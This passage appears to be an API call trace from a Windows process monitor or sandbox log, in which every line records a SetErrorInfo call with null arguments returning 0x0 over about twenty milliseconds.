[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.921] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.921] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.921] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.921] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.921] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.921] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.921] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.921] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.921] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.922] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.923] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.924] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.927] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.927] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.927] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.927] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.927] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.927] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.927] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.927] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.927] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.927] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.927] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.928] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.930] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.931] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.932] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.933] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.933] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.933] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.942] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
